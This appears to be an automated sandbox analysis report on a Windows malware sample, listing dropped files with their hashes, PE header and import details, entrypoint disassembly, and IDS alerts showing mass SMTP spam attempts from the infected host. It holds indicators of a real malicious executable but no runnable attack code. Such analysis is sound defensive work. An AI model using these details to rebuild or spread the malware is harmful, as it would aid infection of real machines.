Preview:	................................................................................x.........P......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................vU-..... .....s.-!............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.x.........P.............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11381075623519665
Encrypted:	false
SSDEEP:	12:OCyTXm/Ey6q9995gP1miUkXg1Q10nMCldimE8eawHza1miIJqj3:OCyKl682P1tUcyMCldzE9BHza1tIJqj3
MD5:	23843E34B8B802FD447254ECD9A261C6
SHA1:	D443556FA54791F3D191D13458F9D5AEE1D0EE6B
SHA-256:	D990425E8BA35B36F7A97E4721C729ABCC312427695F1721975E4E761CD2F3A6
SHA-512:	786FD644ACFCAA19A0CE569361DCE1F3682ABE0BEB8C43221BBADA44D9ACDD1F0D05EA66FA5CF55C53E6116F1560735E1B6D4EEBDD32858C8FF41D5789D14245
Malicious:	false
Reputation:	unknown
Preview:	............................................................................ ...x.........O......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................vU-..... ......&!............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.x.........O.............................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.1 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11378339426766004
Encrypted:	false
SSDEEP:	12:OCy7lmXm/Ey6q9995gA1mK21kXg1Q10nMCldimE8eawHza1mKC:OCy7lzl682A1i1cyMCldzE9BHza1e
MD5:	F661E792F91CCA8D4A38E46FD160565D
SHA1:	A881A5F40A67AE47A4F9E075FCD94A435989EEA8
SHA-256:	E723993110A47629204D7E384A3FF6E52D800CCF2772693CF0EAE7626339FF99
SHA-512:	CFDDE582941B8C0401544F4725BE24F9F2927EA32057A6489394AC05008B7872BACC5667F32E1C1C3625784CBB397F73D436C1D02FF6DEEB5CB52A6919E5F49E
Malicious:	false
Reputation:	unknown
Preview:	............................................................................ ...x........LL......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................vU-..... ......S.!............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.x.........L.............................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hjsrtbw Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	321226
Entropy (8bit):	7.9994599830088875
Encrypted:	true
SSDEEP:	6144:r2cLe+k595ZZLEaato8ejiwCOFO3wZnGJy5f+1MquI0/p+CLtFFpxfWKqn:S2e/5ZZoto8N74G1MqEphjRO
MD5:	65270D2623B18B063F47B1A24AF84D18
SHA1:	606839A4605B5A07D24885B95818FA195BD9ABC8
SHA-256:	0F1EC5E5EF0C3045D493793C0C7DBA468BD31B936EE4664414D3AA99BA239AF1
SHA-512:	008BFF0D77C1D55BCABF985F53A96EA816166B13B79904709490DC99D6266EAC5F29ADBB3B73B9ABB0EB607A033B95860FEEAE6D098AB5D4317FEE8216E76728
Malicious:	false
Reputation:	unknown
Preview:	k.H?..6.M.t..O..L2.S...}3-c%..+.7.Y..a.\3B....5{..\..m.......HY..[.2..4z.d..RC1p..k._.Ja /.z....y]$=m...j...{$b.^......2........,.N......3.]~.+.F....[.4.)...h...W8.....FA."<7B..4..;..6.8./}.S+...8...Eg.s6.....-.ou.d....}.<..'..8....."0.#>...;.LW..:..)/.f....A.Z..fKA...%.=7X...q.Ww.Z.M3.(..[..i.^1.[..........<...m:....F..l;.h...5I..").\|..b=.P=tA.&...In.Hj.hNK........"..htW14W..T....^..q.q.[G.......zEZ.......H...m..Lt.M..o?,..w.....1....34.Hq*#...+D....cI.B.).....yJ.....~.m.l4_....Y.A.l...s.5.yq..q.?..(.o..i..0H....'jlI\...?........VE..v..-.3..z=..K"..n.../...Pqp.@.@..#....J].I..{3?.Y\|...ins.k.%..Z...:..]Lp.5.k.......#....).....F..uc.N`#._..... b.i.........KR....#>d....WY.%..VYc~.OW..><.v......F..\|.".......a..J...b.....7....{W.%..V..e?.M..b....6O...g......;..+.\.,....~..x.#..U.x..g..3....I..I..,Y;....h...6....g...k.A+.i..b.{X$...87.%C%.T=`.si....C=.wl..HH2.H.@,...A..`.w.......y...`.X]......Yadt=G..d.6.6.I....i.R...a...Y"...E..r.{9t.v.1"

C:\Users\user\AppData\Roaming\tvvihsf Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	153088
Entropy (8bit):	6.683446528482172
Encrypted:	false
SSDEEP:	1536:2huZ3/M/yYQ7kAglqRi6awWjs/5jnkx5EaUGSJATEL+hItC3nf:prYQZawCs/Nnkx5EadSJQKt
MD5:	0102055C5FBD724BF28BC696CA22F06D
SHA1:	254C0C655937C98D415CD67097824D5B0C381329
SHA-256:	682EF52E3AB62FC62E75477915BF98A8DA2EF787676C0D9DFB05DE1875195885
SHA-512:	2094435128117B35CBEEF45ECBB724EDFC965100FC2C3307F4FDA3779289784E0AF1FC06A66E43FE8A88B547398DDF0B06218FFE41BA07A205B04AFDFDBF8184
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......_.....................z.......$....... ....@..........................@.......V..............................._..Q....U..<....p...............................!.......................<.......<..@............ ...............................text...a........................... ..`.rdata..1@... ...B..................@..@.data...8...p...:...V..............@....rsrc........p......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tvvihsf:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.683446528482172
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	69CDTt1pad.exe
File size:	153088
MD5:	0102055c5fbd724bf28bc696ca22f06d
SHA1:	254c0c655937c98d415cd67097824d5b0c381329
SHA256:	682ef52e3ab62fc62e75477915bf98a8da2ef787676c0d9dfb05de1875195885
SHA512:	2094435128117b35cbeef45ecbb724edfc965100fc2c3307f4fda3779289784e0af1fc06a66e43fe8a88b547398ddf0b06218ffe41ba07a205b04afdfdbf8184
SSDEEP:	1536:2huZ3/M/yYQ7kAglqRi6awWjs/5jnkx5EaUGSJATEL+hItC3nf:prYQZawCs/Nnkx5EadSJQKt
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......_...

File Icon


Icon Hash:	8c8cbcccce888ae7

Static PE Info

General
Entrypoint:	0x402413
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F98BD9B [Wed Oct 28 00:38:51 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7f519e58768c36b2651aa4c0b9c28c9d

Entrypoint Preview

Instruction
call 00007F81848C9A2Ah
jmp 00007F81848C625Dh
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F81848C6406h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F81848C6430h
test ecx, 00000003h
jne 00007F81848C63D1h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F81848C63CAh
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F81848C6414h
test ah, ah
je 00007F81848C6406h
test eax, 00FF0000h
je 00007F81848C63F5h
test eax, FF000000h
je 00007F81848C63E4h
jmp 00007F81848C63AFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0041229Ch
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F81848C63EEh
test byte ptr [eax], 00000008h
je 00007F81848C63E9h
mov dword ptr [ebp+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x15fe0	0x51	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x155a0	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28a7000	0xc5d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x121f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x13cd0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13c88	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x1b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10e61	0x11000	False	0.809900620404	data	7.56509790612	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x4031	0x4200	False	0.279415246212	data	4.36517156827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x288f238	0x3a00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x28a7000	0xc5d8	0xc600	False	0.713423295455	data	6.69991937422	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x28a74f0	0xea8	data	English	Zimbabwe
RT_ICON	0x28a8398	0x8a8	data	English	Zimbabwe
RT_ICON	0x28a8c40	0x568	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_ICON	0x28a91a8	0x25a8	dBase III DBT, version number 0, next free block index 40	English	Zimbabwe
RT_ICON	0x28ab750	0x10a8	data	English	Zimbabwe
RT_ICON	0x28ac7f8	0x468	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_ICON	0x28accc0	0xea8	data	English	Zimbabwe
RT_ICON	0x28adb68	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 13469504, next used block 1444880	English	Zimbabwe
RT_ICON	0x28ae410	0x568	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_ICON	0x28ae978	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 334423236, next used block 300607925	English	Zimbabwe
RT_ICON	0x28b0f20	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 328944178, next used block 11745314	English	Zimbabwe
RT_ICON	0x28b1fc8	0x988	data	English	Zimbabwe
RT_ICON	0x28b2950	0x468	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_STRING	0x28b3048	0x246	data	English	Zimbabwe
RT_STRING	0x28b3290	0x342	data	English	Zimbabwe
RT_ACCELERATOR	0x28b2e20	0x30	data	English	Zimbabwe
RT_GROUP_ICON	0x28acc60	0x5a	data	English	Zimbabwe
RT_GROUP_ICON	0x28b2db8	0x68	data	English	Zimbabwe
RT_VERSION	0x28b2e90	0x1b4	data
None	0x28b2e60	0xa	data
None	0x28b2e50	0xa	data
None	0x28b2e70	0xa	data
None	0x28b2e80	0xa	data

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasesLengthW, WriteConsoleOutputCharacterA, BuildCommDCBAndTimeoutsA, WriteConsoleOutputW, EndUpdateResourceW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, WaitForSingleObject, GetSystemDefaultLCID, GetModuleHandleW, EnumCalendarInfoExW, SetThreadUILanguage, GetConsoleAliasesLengthA, GetConsoleTitleA, GetEnvironmentStrings, GetConsoleCP, ReadConsoleInputA, SetVolumeMountPointA, lstrcpynW, SetConsoleCursorPosition, GetFileAttributesW, SetTimeZoneInformation, WriteConsoleW, IsBadWritePtr, GetMailslotInfo, lstrcatA, lstrlenW, FlushFileBuffers, InterlockedExchange, FillConsoleOutputCharacterW, ChangeTimerQueueTimer, SetLastError, GetProcAddress, PeekConsoleInputW, EnumDateFormatsExA, CreateTimerQueueTimer, LocalLock, EnterCriticalSection, GlobalGetAtomNameA, ResetEvent, GetLocalTime, LocalAlloc, SetConsoleOutputCP, SetFileApisToANSI, GetOEMCP, GetModuleHandleA, HeapSetInformation, GetCPInfoExA, FindFirstVolumeA, DeleteTimerQueueTimer, GetCurrentProcessId, GetConsoleProcessList, GetModuleFileNameW, GetSystemDefaultLangID, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, Sleep, ExitProcess, GetLastError, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW

USER32.dll

GetAltTabInfoW

Exports

Name	Ordinal	Address
@SetFirstEverVice@8	1	0x401065

Version Infos

Description	Data
InternalName	sagzmioloke.awi
ProductVersion	7.59.22.123
Copyright	Copyrighz (C) 2021, fudkageta
Translation	0x0123 0x003a

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Zimbabwe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/24/21-08:47:50.138358	TCP	567	POLICY SMTP relaying denied	25	49734	104.47.74.33	192.168.2.7
08/24/21-08:47:50.144203	TCP	567	POLICY SMTP relaying denied	25	49736	104.47.74.33	192.168.2.7
08/24/21-08:47:50.170505	TCP	567	POLICY SMTP relaying denied	25	49735	104.47.74.33	192.168.2.7
08/24/21-08:47:50.172356	TCP	567	POLICY SMTP relaying denied	25	49737	104.47.74.33	192.168.2.7
08/24/21-08:47:50.359234	TCP	567	POLICY SMTP relaying denied	25	49745	104.47.17.161	192.168.2.7
08/24/21-08:47:50.416401	TCP	567	POLICY SMTP relaying denied	25	49746	104.47.14.33	192.168.2.7
08/24/21-08:47:50.467084	TCP	567	POLICY SMTP relaying denied	25	49748	104.47.17.161	192.168.2.7
08/24/21-08:47:50.467311	TCP	567	POLICY SMTP relaying denied	25	49747	104.47.17.161	192.168.2.7
08/24/21-08:47:50.932292	TCP	567	POLICY SMTP relaying denied	25	49749	104.47.74.33	192.168.2.7
08/24/21-08:47:50.935217	TCP	567	POLICY SMTP relaying denied	25	49751	104.47.74.33	192.168.2.7
08/24/21-08:47:50.947857	TCP	567	POLICY SMTP relaying denied	25	49752	104.47.74.33	192.168.2.7
08/24/21-08:47:50.952047	TCP	567	POLICY SMTP relaying denied	25	49750	104.47.74.33	192.168.2.7
08/24/21-08:47:51.246757	TCP	567	POLICY SMTP relaying denied	25	49756	104.47.17.161	192.168.2.7
08/24/21-08:47:51.250860	TCP	567	POLICY SMTP relaying denied	25	49755	104.47.18.161	192.168.2.7
08/24/21-08:47:51.457151	TCP	567	POLICY SMTP relaying denied	25	49757	104.47.17.161	192.168.2.7
08/24/21-08:47:51.578455	TCP	567	POLICY SMTP relaying denied	25	49754	104.47.74.33	192.168.2.7
08/24/21-08:47:51.762700	TCP	567	POLICY SMTP relaying denied	25	49753	104.47.73.161	192.168.2.7
08/24/21-08:47:51.771295	TCP	567	POLICY SMTP relaying denied	25	49760	104.47.17.161	192.168.2.7
08/24/21-08:47:52.140246	TCP	567	POLICY SMTP relaying denied	25	49763	104.47.18.161	192.168.2.7
08/24/21-08:47:52.143219	TCP	567	POLICY SMTP relaying denied	25	49762	104.47.18.161	192.168.2.7
08/24/21-08:47:52.195529	TCP	567	POLICY SMTP relaying denied	25	49759	104.47.74.33	192.168.2.7
08/24/21-08:47:52.664187	TCP	567	POLICY SMTP relaying denied	25	49765	104.47.74.33	192.168.2.7
08/24/21-08:47:52.676311	TCP	567	POLICY SMTP relaying denied	25	49764	104.47.74.33	192.168.2.7
08/24/21-08:47:52.874640	TCP	567	POLICY SMTP relaying denied	25	49767	104.47.17.161	192.168.2.7
08/24/21-08:47:52.876854	TCP	567	POLICY SMTP relaying denied	25	49768	104.47.17.161	192.168.2.7
08/24/21-08:47:52.972348	TCP	567	POLICY SMTP relaying denied	25	49766	104.47.73.161	192.168.2.7
08/24/21-08:47:53.389911	TCP	567	POLICY SMTP relaying denied	25	49770	104.47.74.33	192.168.2.7
08/24/21-08:47:53.404332	TCP	567	POLICY SMTP relaying denied	25	49769	104.47.74.33	192.168.2.7
08/24/21-08:47:53.495077	TCP	567	POLICY SMTP relaying denied	25	49771	104.47.74.33	192.168.2.7
08/24/21-08:47:53.671032	TCP	567	POLICY SMTP relaying denied	25	49774	104.47.14.33	192.168.2.7
08/24/21-08:47:53.739499	TCP	567	POLICY SMTP relaying denied	25	49775	104.47.17.161	192.168.2.7
08/24/21-08:47:53.884436	TCP	567	POLICY SMTP relaying denied	25	49772	104.47.74.33	192.168.2.7
08/24/21-08:47:53.890752	TCP	567	POLICY SMTP relaying denied	25	49773	104.47.74.33	192.168.2.7
08/24/21-08:47:54.089145	TCP	567	POLICY SMTP relaying denied	25	49779	104.47.17.161	192.168.2.7
08/24/21-08:47:54.138215	TCP	567	POLICY SMTP relaying denied	25	49778	104.47.17.161	192.168.2.7
08/24/21-08:47:54.201235	TCP	567	POLICY SMTP relaying denied	25	49776	104.47.74.33	192.168.2.7
08/24/21-08:47:54.212138	TCP	567	POLICY SMTP relaying denied	25	49777	104.47.74.33	192.168.2.7
08/24/21-08:47:54.534744	TCP	567	POLICY SMTP relaying denied	25	49782	104.47.13.33	192.168.2.7
08/24/21-08:47:54.534766	TCP	567	POLICY SMTP relaying denied	25	49783	104.47.13.33	192.168.2.7
08/24/21-08:47:54.618029	TCP	567	POLICY SMTP relaying denied	25	49780	104.47.74.33	192.168.2.7
08/24/21-08:47:54.711298	TCP	567	POLICY SMTP relaying denied	25	49784	104.47.17.161	192.168.2.7
08/24/21-08:47:54.742338	TCP	567	POLICY SMTP relaying denied	25	49781	104.47.74.33	192.168.2.7
08/24/21-08:47:54.887410	TCP	567	POLICY SMTP relaying denied	25	49787	104.47.17.161	192.168.2.7
08/24/21-08:47:54.889278	TCP	567	POLICY SMTP relaying denied	25	49788	104.47.17.161	192.168.2.7
08/24/21-08:47:55.096995	TCP	567	POLICY SMTP relaying denied	25	49790	104.47.17.161	192.168.2.7
08/24/21-08:47:55.110594	TCP	567	POLICY SMTP relaying denied	25	49789	104.47.18.161	192.168.2.7
08/24/21-08:47:55.193554	TCP	567	POLICY SMTP relaying denied	25	49785	104.47.56.33	192.168.2.7
08/24/21-08:47:55.299302	TCP	567	POLICY SMTP relaying denied	25	49792	104.47.17.161	192.168.2.7
08/24/21-08:47:55.423438	TCP	567	POLICY SMTP relaying denied	25	49786	104.47.73.161	192.168.2.7
08/24/21-08:47:55.423483	TCP	567	POLICY SMTP relaying denied	25	49793	104.47.17.161	192.168.2.7
08/24/21-08:47:55.633344	TCP	567	POLICY SMTP relaying denied	25	49791	104.47.74.33	192.168.2.7
08/24/21-08:47:55.698458	TCP	567	POLICY SMTP relaying denied	25	49796	104.47.17.161	192.168.2.7
08/24/21-08:47:55.845240	TCP	567	POLICY SMTP relaying denied	25	49797	104.47.17.161	192.168.2.7
08/24/21-08:47:55.968182	TCP	567	POLICY SMTP relaying denied	25	49795	104.47.74.33	192.168.2.7
08/24/21-08:47:56.100737	TCP	567	POLICY SMTP relaying denied	25	49794	104.47.73.161	192.168.2.7
08/24/21-08:47:56.254994	TCP	567	POLICY SMTP relaying denied	25	49801	104.47.17.161	192.168.2.7
08/24/21-08:47:56.421619	TCP	567	POLICY SMTP relaying denied	25	49799	104.47.74.33	192.168.2.7
08/24/21-08:47:56.484409	TCP	567	POLICY SMTP relaying denied	25	49800	104.47.74.33	192.168.2.7
08/24/21-08:47:56.538035	TCP	567	POLICY SMTP relaying denied	25	49802	104.47.13.33	192.168.2.7
08/24/21-08:47:56.868697	TCP	567	POLICY SMTP relaying denied	25	49804	104.47.17.161	192.168.2.7
08/24/21-08:47:57.021218	TCP	567	POLICY SMTP relaying denied	25	49805	104.47.17.161	192.168.2.7
08/24/21-08:47:57.214177	TCP	567	POLICY SMTP relaying denied	25	49803	104.47.73.161	192.168.2.7
08/24/21-08:47:57.335951	TCP	567	POLICY SMTP relaying denied	25	49808	104.47.14.33	192.168.2.7
08/24/21-08:47:57.474713	TCP	567	POLICY SMTP relaying denied	25	49806	104.47.17.161	192.168.2.7
08/24/21-08:47:57.474743	TCP	567	POLICY SMTP relaying denied	25	49807	104.47.17.161	192.168.2.7
08/24/21-08:47:57.858107	TCP	567	POLICY SMTP relaying denied	25	49811	104.47.17.161	192.168.2.7
08/24/21-08:47:57.928740	TCP	567	POLICY SMTP relaying denied	25	49812	104.47.17.161	192.168.2.7
08/24/21-08:47:57.928762	TCP	567	POLICY SMTP relaying denied	25	49809	104.47.14.33	192.168.2.7
08/24/21-08:47:57.946168	TCP	567	POLICY SMTP relaying denied	25	49810	104.47.13.33	192.168.2.7
08/24/21-08:47:58.238466	TCP	567	POLICY SMTP relaying denied	25	49815	104.47.17.161	192.168.2.7
08/24/21-08:47:58.245129	TCP	567	POLICY SMTP relaying denied	25	49813	104.47.13.33	192.168.2.7
08/24/21-08:47:58.818486	TCP	567	POLICY SMTP relaying denied	25	49814	104.47.70.33	192.168.2.7
08/24/21-08:47:58.842093	TCP	567	POLICY SMTP relaying denied	25	49817	104.47.70.33	192.168.2.7
08/24/21-08:47:59.389625	TCP	567	POLICY SMTP relaying denied	25	49819	104.47.70.33	192.168.2.7
08/24/21-08:47:59.629556	TCP	567	POLICY SMTP relaying denied	25	49820	104.47.70.33	192.168.2.7
08/24/21-08:47:59.680250	TCP	567	POLICY SMTP relaying denied	25	49822	104.47.17.161	192.168.2.7
08/24/21-08:47:59.926077	TCP	567	POLICY SMTP relaying denied	25	49824	104.47.17.161	192.168.2.7
08/24/21-08:47:59.938752	TCP	567	POLICY SMTP relaying denied	25	49823	104.47.17.161	192.168.2.7
08/24/21-08:48:00.816783	TCP	567	POLICY SMTP relaying denied	25	49825	104.47.13.33	192.168.2.7
08/24/21-08:48:01.032083	TCP	567	POLICY SMTP relaying denied	25	49816	168.95.6.54	192.168.2.7
08/24/21-08:48:01.106442	TCP	567	POLICY SMTP relaying denied	25	49827	104.47.70.33	192.168.2.7
08/24/21-08:48:01.186569	TCP	567	POLICY SMTP relaying denied	25	49828	104.47.13.33	192.168.2.7
08/24/21-08:48:01.319588	TCP	567	POLICY SMTP relaying denied	25	49826	104.47.73.161	192.168.2.7
08/24/21-08:48:02.197269	TCP	567	POLICY SMTP relaying denied	25	49830	104.47.17.161	192.168.2.7
08/24/21-08:48:02.212374	TCP	567	POLICY SMTP relaying denied	25	49832	104.47.17.161	192.168.2.7
08/24/21-08:48:02.221007	TCP	567	POLICY SMTP relaying denied	25	49831	104.47.17.161	192.168.2.7
08/24/21-08:48:02.229375	TCP	567	POLICY SMTP relaying denied	25	49829	104.47.17.161	192.168.2.7
08/24/21-08:48:02.455765	TCP	567	POLICY SMTP relaying denied	25	49834	104.47.17.161	192.168.2.7
08/24/21-08:48:02.475824	TCP	567	POLICY SMTP relaying denied	25	49835	104.47.17.161	192.168.2.7
08/24/21-08:48:02.886267	TCP	567	POLICY SMTP relaying denied	25	49833	104.47.56.33	192.168.2.7
08/24/21-08:48:02.986517	TCP	567	POLICY SMTP relaying denied	25	49838	104.47.70.33	192.168.2.7
08/24/21-08:48:02.989125	TCP	567	POLICY SMTP relaying denied	25	49837	104.47.70.33	192.168.2.7
08/24/21-08:48:03.075470	TCP	567	POLICY SMTP relaying denied	25	49840	104.47.17.161	192.168.2.7
08/24/21-08:48:03.234288	TCP	567	POLICY SMTP relaying denied	25	49841	104.47.17.161	192.168.2.7
08/24/21-08:48:03.295386	TCP	567	POLICY SMTP relaying denied	25	49842	104.47.13.33	192.168.2.7
08/24/21-08:48:03.451799	TCP	567	POLICY SMTP relaying denied	25	49844	104.47.17.161	192.168.2.7
08/24/21-08:48:03.699298	TCP	567	POLICY SMTP relaying denied	25	49846	104.47.13.33	192.168.2.7
08/24/21-08:48:03.758273	TCP	567	POLICY SMTP relaying denied	25	49847	104.47.17.161	192.168.2.7
